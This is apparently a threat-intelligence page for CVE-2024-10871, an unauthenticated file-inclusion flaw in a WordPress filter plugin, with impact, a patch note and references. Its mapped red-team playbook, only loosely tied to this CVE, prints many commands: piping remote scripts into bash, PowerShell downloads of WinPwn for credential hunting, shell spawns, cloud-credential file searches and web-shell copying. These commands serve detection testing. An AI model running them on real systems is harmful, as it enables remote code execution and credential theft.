CVE-2024-10871
Overview
This vulnerability is a Local File Inclusion (LFI) flaw in the Category Ajax Filter plugin for WordPress, specifically affecting the 'params[caf-post-layout]' parameter. The root cause lies in insufficient input validation and sanitization of this parameter, allowing arbitrary file paths to be included and executed by the server. The affected component is the Category Ajax Filter – Advanced Filter for Posts & Custom Post Types plugin, versions up to and including 2.8.2.
Vulnerability Description
The Category Ajax Filter plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.8.2 via the 'params[caf-post-layout]' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where files with a .php extension can be uploaded and included.
Impact
An unauthenticated attacker can exploit this LFI vulnerability to include and execute arbitrary PHP files on the server, leading to remote code execution. This enables bypassing access controls, data exfiltration, or full system compromise. No authentication or user interaction is required, and the attack can be launched remotely over the network. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms the ease of exploitation and high impact on confidentiality, integrity, and availability of the affected system.
Solution
Users should upgrade the Category Ajax Filter plugin to version 2.8.3 or later, where the vulnerability is patched as per the official WordPress plugin repository and the referenced changeset 3183800. The patch includes proper validation and sanitization of the 'params[caf-post-layout]' parameter to prevent arbitrary file inclusion. Detailed patch instructions and verification can be found in the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb03d81-ac33-487b-bf4d-927e8104866e and the WordPress plugin changelog.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Category Ajax Filter plugin for WordPress is characterized by a Local File Inclusion (LFI) flaw, which is critical due to its potential for severe exploitation. This vulnerability arises from improper validation of user-supplied input, specifically through the 'params[caf-post-layout]' parameter. When an attacker manipulates this parameter, they can trick the server into including and executing arbitrary files stored on the server. This flaw is particularly dangerous as it allows for the execution of PHP code, which can lead to unauthorized access and control over the affected system.
Exploitation of this vulnerability can occur through various attack vectors. An unauthenticated attacker can craft a malicious request that targets the vulnerable parameter, potentially leading to the inclusion of sensitive files, such as configuration files or other PHP scripts. For instance, by including files that contain sensitive information, an attacker could gain access to database credentials or other critical data. Furthermore, if the server is configured to allow file uploads, an attacker could upload a malicious PHP file and subsequently include it, leading to full code execution on the server. This exploitation scenario underscores the ease with which an attacker can leverage this vulnerability, especially in environments where security measures are lax.
The real-world impact of such a vulnerability is significant, posing substantial business risks. Organizations utilizing the affected plugin may face data breaches, loss of sensitive information, and potential legal repercussions due to non-compliance with data protection regulations. Additionally, the ability to execute arbitrary code can lead to the deployment of malware, further compromising the integrity of the server and its data. The reputational damage resulting from a successful attack can be long-lasting, affecting customer trust and potentially leading to a decline in business. The high CVSS score of 9.8 reflects the critical nature of this vulnerability and the urgency for organizations to address it.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular security audits and vulnerability assessments should be conducted to identify and remediate any outdated or vulnerable plugins. Employing web application firewalls (WAFs) can help filter out malicious requests targeting the vulnerable parameter. Additionally, ensuring that all user inputs are properly sanitized and validated can significantly reduce the risk of exploitation. Organizations should also consider implementing strict access controls and monitoring for unusual activity on their servers, which may indicate an attempted exploitation of the vulnerability.
In conclusion, the Local File Inclusion vulnerability in the Category Ajax Filter plugin for WordPress presents a critical risk to organizations that utilize this software. The potential for unauthorized file execution and data exposure necessitates immediate attention and action. By adopting proactive security measures, organizations can mitigate the risks associated with this vulnerability, protecting their systems and sensitive data from malicious actors. The importance of maintaining updated software and implementing robust security practices cannot be overstated in the current threat landscape.
Recent updates to the CVE-2024-10871 vulnerability assessment reveal a significant revision in its severity rating, with the CVSS score now established at 9.8, reflecting its critical impact. This adjustment corresponds with an increase in the Exploit Prediction Scoring System (EPSS) score, which has doubled, indicating a growing likelihood of exploitation attempts in the near term. CSURFACE threat intelligence notes a slight upward trend in exploit probability, although no confirmed proof-of-concept exploits or active exploitation campaigns have been detected by our sensors to date. This elevation in risk metrics underscores the urgency for defenders to prioritize monitoring and defensive measures around affected WordPress environments, as the vulnerability’s capacity for unauthenticated remote code execution remains a potent vector for attackers. The updated risk profile signals that while exploitation is not yet widespread, the conditions for potential attacks are increasingly favorable, necessitating heightened vigilance in threat detection and incident response frameworks.
Affected Products
No CPE information available.
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-193 | PHP Remote File Inclusion |
47%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-10871 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb03d81-ac33-487b-bf4d-927e8104866e?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/category-ajax-filter/tags/2.8.2/includes/functions.php#L180 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3183800/ |